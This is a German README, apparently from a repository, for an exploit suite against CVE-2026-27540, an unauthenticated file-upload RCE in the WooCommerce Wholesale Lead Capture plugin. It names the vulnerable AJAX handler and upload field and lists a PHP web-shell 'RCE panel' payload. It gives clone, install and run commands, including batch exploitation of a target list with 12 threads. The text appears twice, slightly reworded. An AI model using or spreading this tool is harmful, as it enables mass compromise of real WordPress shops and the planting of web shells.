Python-Exploit-Suite für CVE-2026-27540, eine nicht authentifizierte Datei-Upload-RCE im WooCommerce Wholesale Lead Capture-Plugin, mit Fingerprinting, Batch-Targeting und einer RCE-Panel-Payload.
WooCommerce Wholesale Lead Capture (WWLC) — Datei-Upload ohne Authentifizierung → RCE
| Produkt | WooCommerce Wholesale Lead Capture — wwlc-Plugin |
| Version | ≤ 2.0.3.1 |
| Behoben | 2.0.3.2+ — Upload-Handler abgesichert |
| Auth | Unauthentifiziert |
| Vektor | admin-ajax.php?action=wwlc_file_upload_handler |
| Feld | file (Multipart-Upload) |
| Schreibpfad | WordPress-Uploads-Verzeichnis |
| Payload | payloads/x7-panel.php |
wwlc_file_upload_handler POST-Anfragengit clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| Datei | Aufgabe |
|---|---|
winrarzips_brand.py | CMD-Banner (by winrarzips) |
wwlc_core.py | Exploit-Kern |
CVE-2026-27540-Suite.py | Batch- + Einzelziel-CLI |
payloads/x7-panel.php | RCE-Panel |
requirements.txt | Abhängigkeiten |
❌ Ziellisten, Scan-Ergebnisse und Panel-URLs sind nicht im Repo enthalten.
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed
WooCommerce Wholesale Lead Capture (WWLC) — Datei-Upload ohne Authentifizierung → RCE
| Produkt | WooCommerce Wholesale Lead Capture — wwlc-Plugin |
| Betroffen | ≤ 2.0.3.1 |
| Behoben | 2.0.3.2+ — Upload-Handler abgesichert |
| Auth | Unauthentifiziert |
| Vektor | admin-ajax.php?action=wwlc_file_upload_handler |
| Feld | file (Multipart-Upload) |
| Schreibpfad | WordPress-Uploads-Verzeichnis |
| Payload | payloads/x7-panel.php |
wwlc_file_upload_handler POST-Anfragengit clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| Datei | Rolle |
|---|---|
winrarzips_brand.py | CMD-Banner (by winrarzips) |
wwlc_core.py | Exploit-Kern |
CVE-2026-27540-Suite.py | Batch- + Einzelziel-CLI |
payloads/x7-panel.php | RCE-Panel-Payload |
requirements.txt | Abhängigkeiten |
❌ Ziellisten, Scan-Ergebnisse und Live-Panel-URLs sind nicht enthalten.
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed